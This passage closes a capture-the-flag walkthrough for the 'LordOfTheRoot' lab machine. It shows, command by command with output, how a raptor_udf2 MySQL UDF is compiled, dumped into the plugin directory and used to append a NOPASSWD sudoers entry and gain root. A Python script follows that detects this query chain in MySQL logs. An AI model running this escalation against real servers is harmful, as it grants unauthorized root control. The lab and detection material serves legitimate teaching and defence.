char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    return(0);
}

Compile it with the following commands

smeagol@LordOfTheRoot:~$ gcc -g -c raptor_udf2.c
smeagol@LordOfTheRoot:~$ gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc
smeagol@LordOfTheRoot:~$ ls
39166.c Documents examples.desktop Music Public raptor_udf2.o Templates
Desktop Downloads exp Pictures raptor_udf2.c raptor_udf2.so Videos

Finally, connect to the MySQL database and run the following commands to escalate

smeagol@LordOfTheRoot:~$ mysql -uroot -pdarkshadow
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9781
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.08 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
+----------------------------------------------------------------------+
| do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers') |
+----------------------------------------------------------------------+
|                                                                    0 |
+----------------------------------------------------------------------+
1 row in set (0.02 sec)

mysql> quit
Bye
smeagol@LordOfTheRoot:~$ sudo bash
root@LordOfTheRoot:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LordOfTheRoot:~# whoami
root
root@LordOfTheRoot:~# cd /root
root@LordOfTheRoot:/root# ls
buf buf.c Flag.txt other other.c switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root#

As you can see, the privilege escalation succeeded
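As an added defender-side example (not from the original writeup), the query sequence above leaves a recognizable trail in MySQL's general_log. This Python script flags a connection that both writes a file out of the server and registers a UDF via SONAME, and lists the two server conditions the technique depends on. The log lines, the function names and the variables dict are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in the MySQL 5.5 general_log text format (not taken
# from the box). Connection 9781 replays the UDF sequence from the walkthrough;
# connection 9782 is ordinary application traffic that also exports a file.
SAMPLE_LOG = """\
200125 19:30:01\t 9781 Connect\troot@localhost on
200125 19:30:02\t 9781 Query\tuse mysql
200125 19:30:03\t 9781 Query\tcreate table foo(line blob)
200125 19:30:04\t 9781 Query\tinsert into foo values(load_file('/home/smeagol/raptor_udf2.so'))
200125 19:30:05\t 9781 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'
200125 19:30:06\t 9781 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'
200125 19:30:07\t 9781 Query\tselect do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers')
200125 19:30:08\t 9782 Query\tSELECT username FROM Users WHERE id = 1
200125 19:30:09\t 9782 Query\tSELECT * FROM Users INTO OUTFILE '/tmp/users.csv'
"""

# "YYMMDD HH:MM:SS<tab> <id> <Command><tab><Argument>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2})\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$"
)

# The stages of the technique as they show up in query text.
STAGES = {
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "dumpfile": re.compile(r"\binto\s+(?:dumpfile|outfile)\b", re.I),
    "create_udf": re.compile(r"\bcreate\s+(?:aggregate\s+)?function\b.*\bsoname\b", re.I),
    "sudoers": re.compile(r"/etc/sudoers\b"),
}


def parse_general_log(text):
    """Yield one dict (ts, conn, cmd, arg) per well-formed general_log line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def stages_per_connection(text):
    """Map each connection id to the set of technique stages seen on it."""
    hits = defaultdict(set)
    for rec in parse_general_log(text):
        if rec["cmd"] != "Query":
            continue
        for name, rx in STAGES.items():
            if rx.search(rec["arg"]):
                hits[rec["conn"]].add(name)
    return dict(hits)


def udf_chain_connections(text):
    """Connections that wrote a file out of the server AND registered a UDF.

    A lone INTO OUTFILE (an export) or LOAD_FILE is common in legitimate
    use; pairing it with CREATE FUNCTION ... SONAME on the same connection
    is what marks the plugin-drop technique.
    """
    return sorted(
        conn for conn, stages in stages_per_connection(text).items()
        if "dumpfile" in stages and "create_udf" in stages
    )


def udf_hardening_findings(variables, mysqld_user):
    """Flag the two server conditions the technique depends on.

    `variables` maps SHOW VARIABLES names to values and `mysqld_user` is the
    account mysqld runs as; both are supplied by the caller (constructed here).
    """
    findings = []
    if mysqld_user == "root":
        findings.append("mysqld runs as root, so any UDF executes as uid 0")
    if not variables.get("secure_file_priv"):
        findings.append("secure_file_priv is empty, so INTO DUMPFILE can write into plugin_dir")
    return findings


if __name__ == "__main__":
    print(stages_per_connection(SAMPLE_LOG))
    print(udf_chain_connections(SAMPLE_LOG))  # ['9781']
    print(udf_hardening_findings({"secure_file_priv": ""}, "root"))
```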

Summary of techniques

  • Port knocking
  • Time-based blind SQL injection
  • "overlayfs" local privilege escalation
  • Privilege escalation through a root-owned SUID binary
  • Debugging with gdb to derive a Python shellcode PoC
  • MySQL UDF privilege escalation

Game over

Sorry, this time I still could not find that Greek expert's idiot-proof one-click script to clear the box, I am so sorry about this... It's a pity...

The end, to be continued...